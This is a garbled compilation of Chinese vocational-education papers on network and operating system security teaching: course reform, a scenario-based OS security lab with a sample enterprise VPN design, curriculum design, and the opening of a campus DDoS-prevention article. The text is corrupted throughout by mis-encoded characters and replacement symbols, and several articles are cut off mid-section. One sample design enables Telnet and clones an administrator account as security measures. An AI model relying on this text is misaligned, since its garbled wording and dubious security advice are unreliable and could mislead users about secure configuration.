5 課程考核標(biāo)準(zhǔn)與教學(xué)效果
6 教學(xué)隊(duì)伍
本課程教學(xué)團(tuán)隊(duì)現(xiàn)授課教師有7人,專業(yè)學(xué)術(shù)帶頭1人,專職教師中副教授2人,講師3人��,助教1人��;其中具有碩士學(xué)位2人����,在讀碩士3人��,“雙師素質(zhì)”教師達(dá)100%以上�����;網(wǎng)絡(luò)架構(gòu)工程師1人共同實(shí)施;達(dá)到理論實(shí)踐的緊密結(jié)合,理論支撐實(shí)踐操作的提高��,實(shí)踐技能驗(yàn)證理論的指導(dǎo)�。在教學(xué)活動中�����,教師和學(xué)生相互學(xué)習(xí)���,共同提高�。本課程在建設(shè)過程當(dāng)中逐步形成了一支學(xué)歷��、職稱結(jié)構(gòu)合理�����、師資配置完善、梯隊(duì)建設(shè)良好�����、結(jié)構(gòu)比例相對穩(wěn)定的教學(xué)隊(duì)伍�。
7 教學(xué)改革創(chuàng)新與努力方向
7.1 教學(xué)改革創(chuàng)新
本課程采用校企合作、“教-學(xué)-做”一體化的教學(xué)模式��。由本院與藍(lán)盾股份有限公司緊密合作�����,組建藍(lán)盾信息安全實(shí)驗(yàn)室��,為“教-學(xué)-做”一體化教學(xué)提供了非常好的條件。
教學(xué)內(nèi)容改革:教學(xué)內(nèi)容與崗位工作內(nèi)容的一致性�����。
本課程采用:模塊課程模式項(xiàng)目(任務(wù))課程模式活動課程模式工作過程系統(tǒng)化課程模式�����。
考核方式的改革創(chuàng)新
評價(jià)依據(jù):過程技能考核+筆試 摒棄了傳統(tǒng)的一卷考核方式,更加關(guān)注于學(xué)生的職業(yè)能力和職業(yè)素質(zhì)的評價(jià),創(chuàng)新性地采用了專業(yè)交流的方式�����,通過師生對專業(yè)問題面對面的探討來增強(qiáng)學(xué)生的學(xué)習(xí)動力�,同時(shí)考查學(xué)生專業(yè)能力。
7.2 努力方向
完善教學(xué)課程內(nèi)容,探索新的教學(xué)手段�;建立題庫迎合學(xué)生考取認(rèn)證�����;豐富項(xiàng)目案例資源不斷改進(jìn)教學(xué)方法;進(jìn)一步完善師資隊(duì)伍結(jié)構(gòu)����,培養(yǎng)并形成一支教學(xué)水平高���、專兼結(jié)合的高素質(zhì)教學(xué)隊(duì)伍��。
8 結(jié)語
目前���,職業(yè)教育正處于日新月異的課程改革過程中��,努力提升高職教育教學(xué)理念,創(chuàng)新體制機(jī)制�����,突出實(shí)踐教學(xué)�����,深化課程改革�����,更新教學(xué)手段��,課程說課作為現(xiàn)代高職教學(xué)改革的新課題����、教學(xué)研究工作的新形式進(jìn)一步彰顯實(shí)踐教學(xué)特色����,必將成為推動我國高等職業(yè)教育發(fā)展的新動力。
參考文獻(xiàn)
[1] 穆惠英.高職《環(huán)境監(jiān)測》課程說課設(shè)計(jì).中國科教創(chuàng)新導(dǎo)刊,2008.11.
[2] 秦毅��,齊欣.《平面處理技術(shù)》課程說課設(shè)計(jì)案例.電大理工�,2011.3.
[3] 陳麗,伍善廣.高職高專《藥劑學(xué)》.海峽藥學(xué)�,2011.23(8).
[4] 秦愛梅.高職院?���!?dsmax》課程說課設(shè)計(jì).計(jì)算機(jī)光盤軟件與應(yīng)用�,2012(12).
第7篇
關(guān)鍵詞:操作系統(tǒng)安全;工作場景;實(shí)訓(xùn)教學(xué)
高職院校課程改革是加強(qiáng)學(xué)校內(nèi)涵建設(shè)的需要,但職業(yè)教育課程始終未能跳出學(xué)科體系的束縛,使之成為被簡化、被壓縮了的學(xué)科課程的翻版,嚴(yán)重制約了高職教育的發(fā)展。國家教育部組織相關(guān)行業(yè)��、企業(yè)專家�����、生產(chǎn)一線的技術(shù)人員及職教專家,以相關(guān)行業(yè)人力資源需求預(yù)測為基本依據(jù),以就業(yè)為導(dǎo)向,以能力為本位,按照工作流程和崗位需要共同開發(fā)了以“核心課程與訓(xùn)練項(xiàng)目”為主要架構(gòu)的教學(xué)指導(dǎo)方案,突破了職業(yè)教育以課程講授和原理驗(yàn)證為主的傳統(tǒng)教學(xué)模式,充分考慮到用人單位的需求,贏得了行業(yè)����、企業(yè)的認(rèn)可和支持[1-2]�。
在“操作系統(tǒng)安全實(shí)訓(xùn)”課程的教學(xué)過程中,學(xué)生以小組形式模擬一個(gè)項(xiàng)目組,在類工廠的實(shí)訓(xùn)室中,將系統(tǒng)安全規(guī)劃設(shè)計(jì)開發(fā)過程和工作情景引入課堂,使學(xué)生在近似于實(shí)際工作過程的情景下,扮演相關(guān)角色,完成相關(guān)任務(wù)。充分培養(yǎng)了學(xué)生的系統(tǒng)規(guī)劃設(shè)計(jì)能力、團(tuán)隊(duì)合作能力���、工程應(yīng)用能力[2]。通過工作場景模擬實(shí)訓(xùn)課程的思想,在工作環(huán)境中開闊了學(xué)生視野,鍛煉了學(xué)生的團(tuán)隊(duì)意識和工作意識,為今后走上實(shí)際工作崗位���、開發(fā)項(xiàng)目積累經(jīng)歷和經(jīng)驗(yàn),為教師綜合評價(jià)學(xué)生提供了依據(jù)���。
1工作場景模擬教學(xué)法
1.1教學(xué)法的內(nèi)涵和特征
工作場景模擬教學(xué)法[3]是在教學(xué)過程中,使用一種近似于實(shí)際工作的真實(shí)場景,模擬工作中可能發(fā)生的真實(shí)事件,再現(xiàn)工作真實(shí)過程的情景和環(huán)境,讓學(xué)生按照工作流程,在各工作場景中扮演接近真實(shí)身份的角色,通過場景中的一些情節(jié),體驗(yàn)和理解其扮演角色的作用���、工作內(nèi)容等,從而理解教學(xué)內(nèi)容,達(dá)到“寓教于景”教學(xué)目的的教學(xué)方法����。
工作場景模擬教學(xué)法由以下幾個(gè)特征:1)實(shí)踐性強(qiáng)。能為學(xué)生提供一個(gè)接近真實(shí)的工作場景,在工作環(huán)境中體驗(yàn)學(xué)習(xí),將理論知識和實(shí)際操作應(yīng)用于項(xiàng)目,在工作中能充分表現(xiàn)自己的才能,發(fā)揮創(chuàng)新潛能,從而增強(qiáng)對實(shí)際問題的預(yù)測與處理能力�。2)動態(tài)性強(qiáng)��。在教學(xué)中,學(xué)生是活動的主體,教師只起組織指導(dǎo)作用。3)交互性強(qiáng)����。表現(xiàn)在學(xué)生之間對項(xiàng)目規(guī)劃討論,學(xué)生與教師的主動交流,有利于知識的傳遞和思想的集中�����。4)協(xié)作性強(qiáng)。項(xiàng)目由小組共同完成,有利于創(chuàng)設(shè)和諧的學(xué)習(xí)氛圍,培養(yǎng)學(xué)生團(tuán)隊(duì)合作能力����。
1.2教學(xué)法的迫切性
目前,社會及用人單位對學(xué)生動手實(shí)踐能力要求高,希望學(xué)生一畢業(yè)就能夠上崗?fù)瓿蓪?shí)際開發(fā)任務(wù)�����。一些學(xué)校為適應(yīng)這種需求,盡量送學(xué)生去企業(yè)或相關(guān)單位實(shí)訓(xùn),但這種實(shí)訓(xùn)往往因?yàn)闂l件限制�、人為因素等不能滿足所有學(xué)生��。而在課堂上完成實(shí)訓(xùn)任務(wù),按照傳統(tǒng)的教學(xué)模式,教師出題目���、提要求,最后進(jìn)行檢查,學(xué)生不能很好地體驗(yàn)實(shí)際項(xiàng)目開發(fā)的規(guī)則�����、制度�、過程、管理和規(guī)范,與實(shí)際的工作場景嚴(yán)重脫節(jié)��。
2操作系統(tǒng)安全實(shí)訓(xùn)課程設(shè)計(jì)與組織
在實(shí)際項(xiàng)目開發(fā)中,項(xiàng)目組經(jīng)常會采用封閉式集中開發(fā)的形式,便于學(xué)生今后能夠在實(shí)際崗位中適應(yīng)這種形式的工作��。在考勤上模擬工作考勤制度,學(xué)生實(shí)訓(xùn)時(shí)間從下午3點(diǎn)到晚上9點(diǎn),中間有1小時(shí)休息時(shí)間,下午3點(diǎn)上課前利用電腦上的聯(lián)創(chuàng)系統(tǒng)實(shí)行實(shí)名簽到制度,模擬工作中的上班打卡,晚到學(xué)生要根據(jù)遲到時(shí)間長短扣除相應(yīng)平時(shí)出勤分?jǐn)?shù),模擬工作中扣除工資和獎金;工作時(shí)間嚴(yán)格控制學(xué)生出入次數(shù)和時(shí)間;嚴(yán)格控制網(wǎng)絡(luò),只允許項(xiàng)目組長上網(wǎng),對外網(wǎng)信息的上傳進(jìn)行控制最大不超過1M,不允許使用優(yōu)盤等存儲設(shè)備(防止公司信息外泄);晚上9點(diǎn)同樣模擬工作場景,嚴(yán)格控制下班時(shí)間�?���?此坪軞埧岬目己酥贫?實(shí)際上是讓學(xué)生真正體會職場的嚴(yán)格制度和工作艱辛。具體教學(xué)過程設(shè)計(jì)如圖1所示���。
1) 第1階段。
根據(jù)實(shí)際情況以5~6人為單位進(jìn)行分組,成立項(xiàng)目組推選出組長(項(xiàng)目經(jīng)理),成立以教師為領(lǐng)導(dǎo)����、各項(xiàng)目經(jīng)理為成員的臨時(shí)評審團(tuán)���。同時(shí),教師公布事先準(zhǔn)備好的幾個(gè)公司的項(xiàng)目需求(以類似于招標(biāo)書的形式于內(nèi)網(wǎng)服務(wù)器)供學(xué)生選擇(圖2給出其中1個(gè)中型企業(yè)的項(xiàng)目需求)�。
公司背景:
紹興XX公司是一家年產(chǎn)值上億的中型企業(yè),總部在紹興市區(qū),有多家子公司分布在上虞����、諸暨等地,公司網(wǎng)絡(luò)曾經(jīng)發(fā)生過幾次網(wǎng)絡(luò)安全事件,給公司帶來了一些經(jīng)濟(jì)損失,公司決定增加網(wǎng)絡(luò)安全投入,提高網(wǎng)絡(luò)安全管理水平。
具體需求:
1. 用一個(gè)虛擬機(jī)模擬公司總部,一個(gè)虛擬機(jī)(或者是主機(jī))模擬子公司或外地出差人員�。
2. 總部和子公司需要使用VPN通信(為了保證信息的安全防止中間人攻擊,采用IPSEC來保證隧道的安全性)���。
3. 公司總部的Web���、Ftp等服務(wù)器對內(nèi)網(wǎng)用戶開放�����。
4. 公司內(nèi)部不同部門不同職位所具有的權(quán)限不一樣�����。
圖2某中型企業(yè)的需求
項(xiàng)目組根據(jù)所學(xué)的操作系統(tǒng)安全和局域網(wǎng)組建知識及本組的實(shí)際情況,選擇一個(gè)合適的需求,收集信息,共同討論,分析規(guī)劃,撰寫項(xiàng)目設(shè)計(jì)初步方案和匯報(bào)PPT,最后寫出相應(yīng)的投標(biāo)書�。在指定時(shí)間,由各小組派代表介紹自己的項(xiàng)目規(guī)劃,接受評審團(tuán)的提問(記錄相關(guān)信息并給出成績),由評審團(tuán)投票決定是否通過,若落選,重新選題,否則公布結(jié)果(包括第1階段的成績)����。
2) 第2階段。
項(xiàng)目組提出設(shè)計(jì)方案,圖3給出某項(xiàng)目組對上述需求的設(shè)計(jì)方案,然后制定項(xiàng)目計(jì)劃,再由項(xiàng)目經(jīng)理對項(xiàng)目進(jìn)行劃分(提交教師審核),最后下發(fā)任務(wù)給項(xiàng)目成員。在實(shí)訓(xùn)室中盡可能的模擬真實(shí)的工作環(huán)境和條件,完成項(xiàng)目設(shè)計(jì)方案的內(nèi)容,測試人員同步跟進(jìn),及時(shí)記錄測試清單,教師巡回指導(dǎo),碰到共性問題集中講解,包括對部分理論知識的講解�。在開發(fā)過程中嚴(yán)格控制工作進(jìn)度,各小組“下班”前,提交每天的開發(fā)日志(模板如圖4),明確當(dāng)天的進(jìn)度完成程度,如未按計(jì)劃完成則給出理由和解決方法����。項(xiàng)目經(jīng)理按時(shí)向教師匯報(bào)小組情況,以便教師掌握項(xiàng)目的實(shí)施進(jìn)度�。項(xiàng)目實(shí)施完成后,小組之間進(jìn)行交叉測試,檢查是否全部實(shí)現(xiàn)項(xiàng)目所要求的內(nèi)容及其實(shí)用性、可操作性、效率等,并及時(shí)進(jìn)行修正����。最后,撰寫竣工報(bào)告和項(xiàng)目匯報(bào)的PPT��。
某小組作為網(wǎng)絡(luò)安全公司,為該中型企業(yè)設(shè)計(jì)的安全管理方案,實(shí)現(xiàn)以下安全要求:
1. 子公司可以通過IPSEC安全方式構(gòu)建VPN隧道技術(shù)。
2. 為了防止黑客通過445端口在局域網(wǎng)中輕松訪問各種共享文件夾或共享打印機(jī),故在總部關(guān)閉445端口,開始開啟TELNET服務(wù)。
3. 公司總部為經(jīng)理、技術(shù)總監(jiān)、普通員工,分配不同權(quán)限的賬號,經(jīng)理具有管理員權(quán)限,是管理員組的一員;技術(shù)總監(jiān)是和普通員工都是普通賬號;公司改革,經(jīng)理兼任技術(shù)總監(jiān),故希望技術(shù)總監(jiān)賬號克隆經(jīng)理賬號,共享其所有權(quán)限�。為了節(jié)約磁盤空間,對普通用戶設(shè)置磁盤配額,每人只能使用350M的空間,超過200M發(fā)出警告,而所有普通員工自己增加的文件和文件夾都要用EFS加密,并導(dǎo)出其密鑰�����。
4. 公司規(guī)定所有賬號都不得采用弱密碼,開啟復(fù)雜性要求、設(shè)置最小密碼長度為6�����、密碼最長留存期為30天。
5. 公司為了實(shí)現(xiàn)信息公開化,信息共享,創(chuàng)建了Web��、Ftp兩個(gè)服務(wù)器,并設(shè)置了DNS,方便域名訪問����。對于Web站點(diǎn)公司希望實(shí)現(xiàn)一個(gè)站點(diǎn)對應(yīng)兩個(gè)IP地址(因?yàn)楣镜刂穼⒂须娦?����、網(wǎng)通的,而暫時(shí)只有電信的,為了防止環(huán)路,要求在同一張網(wǎng)卡下配置多個(gè)IP地址),同時(shí)希望隧道用戶才能訪問站點(diǎn),并限制帶寬為5M,連接數(shù)為50���。同時(shí)Ftp服務(wù)器實(shí)現(xiàn)匿名訪問,只允許隧道用戶訪問,限制連接數(shù)量為25,要求能讀寫�。
圖3某中型企業(yè)的設(shè)計(jì)方案
項(xiàng)目名稱 組號
項(xiàng)目組成員
時(shí)間 地點(diǎn)
時(shí)間段
每名同學(xué)的工作內(nèi)容
01 02 03 04
是否完成
進(jìn)度
遇到的問題及解決方法
工作心得
參考資料
圖4項(xiàng)目開發(fā)日志
3) 第3階段����。
各小組向全班同學(xué)介紹演示自己的項(xiàng)目,隨時(shí)接受班級同學(xué)提問,分享項(xiàng)目開發(fā)經(jīng)驗(yàn)。評審團(tuán)按照學(xué)
生提交的工作成果,參照項(xiàng)目進(jìn)度計(jì)劃和項(xiàng)目需求,確認(rèn)總結(jié)學(xué)生的階段工作成果。教師對小組的整體設(shè)計(jì)以及在實(shí)訓(xùn)中的問題進(jìn)行評析,公布相應(yīng)成績����。最后由學(xué)生和老師共同評選出最佳項(xiàng)目組��。
3教師在模擬過程中的作用
在整個(gè)工作情景模擬過程中,教師的位置應(yīng)處于輔助地位,學(xué)生是主角,教師協(xié)助各開發(fā)小組完成實(shí)訓(xùn)任務(wù)。
1) 明確角色和任務(wù)����。引導(dǎo)每個(gè)學(xué)生明確自己的角色和任務(wù),提醒和引導(dǎo)學(xué)生成功扮演相應(yīng)角色,起到一個(gè)導(dǎo)演的作用���。
2) 跟蹤監(jiān)控工作過程�����。跟蹤項(xiàng)目規(guī)劃設(shè)計(jì)實(shí)施的全過程,通過旁聽討論會、檢查記錄,及組長的進(jìn)度匯報(bào)來監(jiān)控小組的方向;檢查開發(fā)日志監(jiān)管系統(tǒng)質(zhì)量和進(jìn)度;檢查考勤情況,監(jiān)控遵守和執(zhí)行規(guī)章制度的情況;通過評審監(jiān)控最終系統(tǒng)的效果和質(zhì)量。
3) 指導(dǎo)和幫助�����。在第1階段,負(fù)責(zé)為學(xué)生提供各種文獻(xiàn)資料或查閱文獻(xiàn)資料的途徑,幫助學(xué)生制定調(diào)查問卷和討論主題,提供規(guī)劃設(shè)計(jì)及投標(biāo)書的規(guī)范說明,并根據(jù)討論會記錄和需求規(guī)格說明,給出建議和意見�。在第2階段,幫助解決學(xué)生未能解決的問題��。在第3階段,幫助學(xué)生規(guī)范測試過程和測試報(bào)告的書寫,參與評審答辯,幫助學(xué)生完善系統(tǒng)功能和性能���。
4) 評價(jià)��。觀察每個(gè)學(xué)生在工作過程中的表現(xiàn),包括出勤、工作態(tài)度���、參與情況、工作量,通過評審其所負(fù)責(zé)部分的系統(tǒng)設(shè)計(jì)和開發(fā)質(zhì)量,以及各階段的小組成績,給出每個(gè)學(xué)生的總體評價(jià)或總評成績�����。
4結(jié)語
工作場景模擬教學(xué)法應(yīng)用于操作系統(tǒng)安全實(shí)訓(xùn)課程,是對實(shí)訓(xùn)課程的科學(xué)改革���。該方法既有利于課程目標(biāo)的實(shí)現(xiàn),又使學(xué)生角色扮演中,體驗(yàn)到真實(shí)項(xiàng)目實(shí)施的工作過程���、工作場景和相關(guān)制度����、規(guī)則及規(guī)范,讓學(xué)生對未來職場有感性的認(rèn)識和了解,為走上IT工作崗位做實(shí)戰(zhàn)準(zhǔn)備。
參考文獻(xiàn):
[1] 姜大源. 當(dāng)代德國職業(yè)教育主流教學(xué)思想研究:理論���、實(shí)踐與創(chuàng)新[M]. 北京:清華大學(xué)出版社,2007:50-100.
[2] 錢宇虹. 基于工作過程的高職軟件項(xiàng)目開發(fā)綜合實(shí)訓(xùn)開發(fā)探索[J]. 計(jì)算機(jī)教育,2008(20):175-178.
[3] 閆樂林,蔡平勝,元萊濱. 場景模擬教學(xué)法在“計(jì)算機(jī)網(wǎng)絡(luò)”課程中的應(yīng)用研究[J]. 計(jì)算機(jī)教育,2009(18):116-118.
[4] 柴巧葉. 基于“中小型網(wǎng)絡(luò)構(gòu)建與管理”的項(xiàng)目教學(xué)的探索與實(shí)踐[J]. 計(jì)算機(jī)教育,2009(22):132-134.
Research on Operating System Security Training Based on Working Scenario Teaching
DU Huan-qiang, YUAN Si-da, CHEN Jun
(Department of Computer Science, Zhejiang Industry Polytechnic College, Shaoxing 312000, China)
第8篇
一、計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)面向工程的教學(xué)改革思路
針對不同階段的實(shí)驗(yàn)教學(xué)確定不同的任務(wù)定位����。院定必修課著眼于提高學(xué)生的科學(xué)素質(zhì)與人文素養(yǎng)����,以培養(yǎng)學(xué)生的基本實(shí)驗(yàn)技能�����、科學(xué)的思維能力和創(chuàng)新意識為主要教學(xué)目標(biāo)。系定必修課和專業(yè)方向課及實(shí)踐教學(xué)著眼于對學(xué)生進(jìn)行工程技術(shù)人員的基本訓(xùn)練,以培養(yǎng)工程實(shí)踐能力和創(chuàng)造能力為主要教學(xué)目標(biāo)。
針對傳統(tǒng)的專業(yè)實(shí)驗(yàn)課與工程嚴(yán)重脫節(jié)的狀況���,實(shí)行專業(yè)實(shí)驗(yàn)課的工程化�,即系定必修課程及實(shí)驗(yàn)課要面向工程��,要緊緊圍繞工程和聯(lián)系工程進(jìn)行��。
針對傳統(tǒng)的專業(yè)實(shí)驗(yàn)基本都是驗(yàn)證性實(shí)驗(yàn)的狀況,增設(shè)綜合性�����、設(shè)計(jì)性和創(chuàng)新性實(shí)驗(yàn)����,以培養(yǎng)學(xué)生的創(chuàng)新能力和綜合實(shí)踐能力。
針對傳統(tǒng)的專業(yè)實(shí)驗(yàn)課從屬于理論課的狀況���,實(shí)行獨(dú)立設(shè)置的實(shí)訓(xùn)課程和單獨(dú)考核。在進(jìn)入畢業(yè)實(shí)習(xí)前�����,進(jìn)行一次網(wǎng)絡(luò)工程綜合實(shí)訓(xùn)�,這一獨(dú)立設(shè)置的實(shí)訓(xùn)課程名為網(wǎng)絡(luò)集成技術(shù),它涉及網(wǎng)絡(luò)技術(shù)的所有方面�,并可通過專業(yè)實(shí)驗(yàn)室實(shí)施���。
針對高等職業(yè)院校只局限于校內(nèi)教學(xué)活動的情況���,實(shí)施“走出去�、請進(jìn)來”的面向工程的授課方式�����,加強(qiáng)校內(nèi)外實(shí)習(xí)實(shí)踐基地建設(shè)。
二、計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)面向工程的實(shí)踐教學(xué)體系
建立面向工程的實(shí)踐教學(xué)體系是一個(gè)復(fù)雜的系統(tǒng)工程。該體系包含三個(gè)部分:課程體系及內(nèi)容�����、網(wǎng)絡(luò)實(shí)踐體系(實(shí)驗(yàn)�、實(shí)訓(xùn)和實(shí)習(xí))、網(wǎng)絡(luò)工程應(yīng)用。在該體系中��,要始終以網(wǎng)絡(luò)工程應(yīng)用為最終目標(biāo)���,建立課程體系����、整合課程內(nèi)容,設(shè)置層次網(wǎng)絡(luò)實(shí)踐體系�����;課程體系及內(nèi)容服從����、服務(wù)于網(wǎng)絡(luò)實(shí)踐;網(wǎng)絡(luò)實(shí)踐容服從、服務(wù)于網(wǎng)絡(luò)工程應(yīng)用。
1.建立面向工程的課程體系
從應(yīng)用型人才培養(yǎng)的全局來看,當(dāng)前課程改革的主要任務(wù)是重新審定�����、合理調(diào)整總的課程設(shè)置����。在計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)中,減少專業(yè)必修課,按照計(jì)算機(jī)網(wǎng)絡(luò)���、網(wǎng)絡(luò)工程、網(wǎng)絡(luò)管理與安全和網(wǎng)絡(luò)軟件開發(fā)4個(gè)方向增加選修課。明確每門課程在培養(yǎng)計(jì)劃中的地位與作用�����,增加綜合素質(zhì)養(yǎng)成需要的宏觀性課程����,充實(shí)新興的高科技應(yīng)用成果����。
課程改革不僅要以就業(yè)崗位群對人才知識結(jié)構(gòu)的要求為依據(jù)�,建立模塊化的課程體系�,而且要改革課程內(nèi)容設(shè)置,打破課程的界限,根據(jù)高職計(jì)算機(jī)網(wǎng)絡(luò)教學(xué)的實(shí)際,進(jìn)行課程內(nèi)容的整合與拆分��,提高課程教學(xué)的效果和質(zhì)量��。
調(diào)整網(wǎng)絡(luò)專業(yè)系定必修課和實(shí)驗(yàn)課的教學(xué)方式�����,將實(shí)驗(yàn)、實(shí)訓(xùn)、實(shí)習(xí)等實(shí)踐性課程與理論教學(xué)有機(jī)統(tǒng)一起來��,面向工程應(yīng)用實(shí)施教學(xué)計(jì)劃���,重點(diǎn)突出知識的應(yīng)用性和實(shí)踐性�。
2.建立面向工程的網(wǎng)絡(luò)實(shí)踐體系
面向工程的實(shí)踐教學(xué)體系包括實(shí)驗(yàn)、實(shí)訓(xùn)和實(shí)習(xí)三個(gè)部分。實(shí)驗(yàn)基于網(wǎng)絡(luò)基礎(chǔ)理論知識,進(jìn)行基本技能的培養(yǎng)����。實(shí)訓(xùn)主要鍛煉學(xué)生對網(wǎng)絡(luò)工程的整體規(guī)劃���、設(shè)計(jì)和創(chuàng)新能力����。實(shí)習(xí)要求學(xué)生走出校園進(jìn)入企業(yè)鍛煉�����,在實(shí)際網(wǎng)絡(luò)工程項(xiàng)目實(shí)踐中進(jìn)行鍛煉,總結(jié)經(jīng)驗(yàn)��、教訓(xùn)���,提高綜合設(shè)計(jì)創(chuàng)新能力��。其中�����,實(shí)驗(yàn)是工程實(shí)訓(xùn)的基礎(chǔ),實(shí)訓(xùn)又是實(shí)習(xí)的基礎(chǔ)���,這三者之間關(guān)系是逐層深入的,從而形成了系統(tǒng)而有層次的實(shí)踐教學(xué)體系����。
(1)實(shí)驗(yàn)項(xiàng)目的設(shè)計(jì)����。按照實(shí)驗(yàn)教學(xué)方式�����,實(shí)驗(yàn)教學(xué)分為以下幾種形式:驗(yàn)證性實(shí)驗(yàn)�、綜合性實(shí)驗(yàn)�����、設(shè)計(jì)性實(shí)驗(yàn)和研究創(chuàng)新性實(shí)驗(yàn)。過去在教學(xué)過程中,多以驗(yàn)證性實(shí)驗(yàn)項(xiàng)目為主,各任課教師需要進(jìn)一步優(yōu)化設(shè)計(jì)課程實(shí)驗(yàn)方案��,適當(dāng)精簡驗(yàn)證性實(shí)驗(yàn)����,增加綜合性實(shí)驗(yàn)和設(shè)計(jì)性實(shí)驗(yàn)比重。實(shí)驗(yàn)教學(xué)做到精講多練����。
(2)實(shí)訓(xùn)項(xiàng)目的設(shè)計(jì)�。在本專業(yè)“計(jì)算機(jī)網(wǎng)絡(luò)”��、“網(wǎng)絡(luò)工程”�����、“網(wǎng)絡(luò)管理與安全”和“網(wǎng)絡(luò)軟件開發(fā)”等多門課程學(xué)習(xí)的基礎(chǔ)上��,增加了“計(jì)算機(jī)網(wǎng)絡(luò)工程綜合實(shí)訓(xùn)”這門課程,通過2個(gè)專業(yè)實(shí)踐周完成��。目的是將所學(xué)的網(wǎng)絡(luò)基礎(chǔ)知識結(jié)合實(shí)際網(wǎng)絡(luò)工程項(xiàng)目要求進(jìn)行系統(tǒng)性的訓(xùn)練��。實(shí)訓(xùn)業(yè)務(wù)參照各行業(yè)信息化規(guī)范�����、企業(yè)用人標(biāo)準(zhǔn)和崗位要求,從職業(yè)道德和職業(yè)技能兩方面強(qiáng)化學(xué)生的能力培養(yǎng)��,其培養(yǎng)目標(biāo)涵蓋:項(xiàng)目經(jīng)理�����、網(wǎng)絡(luò)架構(gòu)設(shè)計(jì)師�、網(wǎng)絡(luò)施工員��、網(wǎng)絡(luò)維護(hù)員���、網(wǎng)絡(luò)管理員和信息安全師等。計(jì)算機(jī)網(wǎng)絡(luò)綜合實(shí)訓(xùn)的內(nèi)容包括:工作組級局域網(wǎng)設(shè)計(jì)與應(yīng)用;校園網(wǎng)的規(guī)劃與設(shè)計(jì)��;校園網(wǎng)站建設(shè)維護(hù)���;電子商務(wù)平臺建設(shè)維護(hù)���;企業(yè)構(gòu)建IP電話系統(tǒng)�����。
(3)網(wǎng)絡(luò)工程實(shí)習(xí)����。實(shí)施“走出去�����、請進(jìn)來”的面向工程的授課方式����。建立校企培養(yǎng)模式���,使學(xué)生即學(xué)即用�����,了解網(wǎng)絡(luò)技術(shù)及施工特點(diǎn)和規(guī)范����,激發(fā)學(xué)生的學(xué)習(xí)興趣����,達(dá)到了傳統(tǒng)教學(xué)方式所不及的效果���。同時(shí)����,聘請一批網(wǎng)絡(luò)工程和網(wǎng)絡(luò)開發(fā)第一線的工程技術(shù)人員,定期到校進(jìn)行課程教學(xué)和開設(shè)講座�����,讓學(xué)生了解到網(wǎng)絡(luò)技術(shù)新發(fā)展���、新工藝��,通過講課和講座���,提高學(xué)生對專業(yè)實(shí)踐能力的重視程度�����。
3.面向工程的網(wǎng)絡(luò)實(shí)驗(yàn)���、實(shí)訓(xùn)平臺的設(shè)計(jì)
面向工程的網(wǎng)絡(luò)實(shí)驗(yàn)����、實(shí)訓(xùn)平臺應(yīng)提供真實(shí)的網(wǎng)絡(luò)環(huán)境���,可以讓學(xué)生親自動手完成實(shí)驗(yàn)實(shí)訓(xùn)項(xiàng)目��,加深對網(wǎng)絡(luò)原理、協(xié)議�、標(biāo)準(zhǔn)的認(rèn)識����,從而提高學(xué)生的網(wǎng)絡(luò)技能和實(shí)戰(zhàn)能力�����。因此�����,網(wǎng)絡(luò)實(shí)驗(yàn)實(shí)訓(xùn)平臺的建設(shè)尤為重要。根據(jù)實(shí)驗(yàn)臺功能的不同���,分為基礎(chǔ)實(shí)驗(yàn)臺、安全試驗(yàn)臺�、無線試驗(yàn)臺和VoIP實(shí)驗(yàn)臺�����。每種試驗(yàn)臺由實(shí)驗(yàn)需要的硬件組成,包括路由器�、核心交換機(jī)��、三層交換機(jī)、二層交換機(jī)��、防火墻��、工作站�����、服務(wù)器�����、無線AP���、VoIP語音模塊等��。該環(huán)境有很強(qiáng)的適應(yīng)性,根據(jù)不同的實(shí)驗(yàn)實(shí)訓(xùn)要求,可以配置不同的基礎(chǔ)平臺,如軟件開發(fā)平臺可以直接提供路由和DNS環(huán)境�����,網(wǎng)絡(luò)安全實(shí)驗(yàn)臺則可提供完全的Internet技術(shù)環(huán)境���。該平臺可以實(shí)現(xiàn)計(jì)算機(jī)網(wǎng)絡(luò)��、網(wǎng)絡(luò)工程��、網(wǎng)絡(luò)管理與安全和網(wǎng)絡(luò)軟件開發(fā)4個(gè)方向的所有實(shí)驗(yàn)實(shí)訓(xùn)項(xiàng)目。實(shí)現(xiàn)了理論的實(shí)驗(yàn)化、實(shí)驗(yàn)的工程化���、工程的系統(tǒng)化、系統(tǒng)的集成化。
4.實(shí)驗(yàn)�����、實(shí)訓(xùn)成績考核與效果評價(jià)
第9篇
關(guān)鍵詞:校園網(wǎng);DDoS��;防范��;措施
中圖分類號:TP393 文獻(xiàn)標(biāo)識碼:A 文章編號:1009-3044(2014)20-4716-02
Campus Network DDoS Attack Prevention Measures
ZENG Xiao-jie1 �����;ZHOU Zai-hong2
(1.Loudi Vocational & Technical College���, Loudi 417000�����,China�����;2.Guangdong Medical College, Dongguan 523808,China)
Abstract: The campus network in Colleges and universities because of some inherent problems of its own development�����, make it vulnerable to the attack of various security threats such as DDoS etc.. In this paper����, the author through the observation and analysis of the campus network for many years, the campus network DDoS attack prevention measures�����, and achieved good results.
Key words: campus network���; DDoS���; prevention���; measures
近年來�����,高校教育信息化出現(xiàn)迅猛發(fā)展的態(tài)勢,高校校園網(wǎng)出現(xiàn)了新的建設(shè)���,新設(shè)備、新技術(shù)不斷涌現(xiàn)����?��?墒?��,由于網(wǎng)絡(luò)的開放性以及日益泛濫的病毒和攻擊工具���,校園網(wǎng)的安全問題日益凸顯�����,如計(jì)算機(jī)病毒、拒絕服務(wù)����、網(wǎng)絡(luò)漏洞�����、網(wǎng)絡(luò)資源濫用等校園網(wǎng)絡(luò)事件不斷出現(xiàn)。分布式拒絕服務(wù)攻擊(Distributed Denial of Service―DDoS) 是互聯(lián)網(wǎng)安全的嚴(yán)重威脅[1]����,在校園網(wǎng)內(nèi)也時(shí)有發(fā)生��,對校園網(wǎng)造成了很大的后果��,嚴(yán)重影響了學(xué)校正常的教學(xué)�、科研、管理工作的順利開展����。該文從校園網(wǎng)安全狀況的角度�����,分析了DDoS攻擊方式和簡單判定方法,并總結(jié)了校園網(wǎng)防范DDoS攻擊的一般性措施��。
1 校園網(wǎng)絡(luò)安全現(xiàn)狀
